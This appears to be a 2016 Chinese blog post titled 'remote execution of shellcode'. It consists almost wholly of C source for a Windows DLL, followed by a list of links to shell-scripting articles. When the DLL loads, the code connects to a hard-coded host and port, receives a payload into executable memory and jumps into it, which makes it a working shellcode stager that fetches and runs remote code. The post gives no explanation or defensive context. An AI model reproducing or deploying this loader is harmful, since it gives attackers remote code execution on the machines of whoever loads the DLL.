远程执行shellcode
2016-06-13 10:21
417 查看
#include "Windows.h" #include <WinSock2.h> #include <stdio.h> #pragma comment(lib,"WS2_32.lib") int shellcode_execute() { WSADATA wsData; if(WSAStartup(MAKEWORD(2,2),&wsData)) { printf("WSAStartp fail.\n"); return 0; } SOCKET sock = WSASocket(AF_INET,SOCK_STREAM,0,0,0,0); SOCKADDR_IN server; ZeroMemory(&server,sizeof(SOCKADDR_IN)); server.sin_family = AF_INET; server.sin_addr.s_addr = inet_addr("192.168.127.132"); //server ip server.sin_port = htons(8888); //server port if(SOCKET_ERROR == connect(sock,(SOCKADDR*)&server,sizeof(server))) { printf("connect to server fail.\n"); closesocket(sock); WSACleanup(); return 0; } u_int payloadLen; if (recv(sock,(char*)&payloadLen,sizeof(payloadLen),0) != sizeof(payloadLen)) { printf("recv error\n"); closesocket(sock); WSACleanup(); return 0; } char* orig_buffer = (char*)VirtualAlloc(NULL,payloadLen,MEM_COMMIT,PAGE_EXECUTE_READWRITE); char* buffer = orig_buffer; int ret = 0; do { ret = recv(sock,buffer,payloadLen,0); buffer += ret; payloadLen -= ret; } while (ret > 0 && payloadLen > 0); //执行shellcode __asm { mov edi,sock; jmp orig_buffer; } VirtualFree(orig_buffer,0,MEM_RELEASE); } BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: shellcode_execute(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; }
相关文章推荐
- Shell命令
- 使用shell实现对xml文件的指定字段进行修改,默认替换成当时的时间戳
- [Android]使用BeanShell实现Android简易科学计算器
- HBase 常见Shell命令总结
- shell变量的简单说明
- 浅谈shell—eval
- shell 基础 $(cd `dirname $0`;pwd)
- shell 脚本
- shell实现ftp命令示例
- Shell 字符串、数字、文件判断
- Xshell无法连接Ubuntu,但能够ping通虚拟机
- shell基础
- Shell命令速查
- Shell中命令替换$(...)与后置引用`...`的区别与联系
- Linux Shell系列教程之(九)Shell判断 if else 用法
- Powershell学习之道-文件夹共享及磁盘映射
- shell脚本摘要
- mac环境变量设置
- Shell特殊变量:Shell $0, $#, $*, $@, $?, $$和命令行参数
- Shell中条件判断if中的各种参数的意思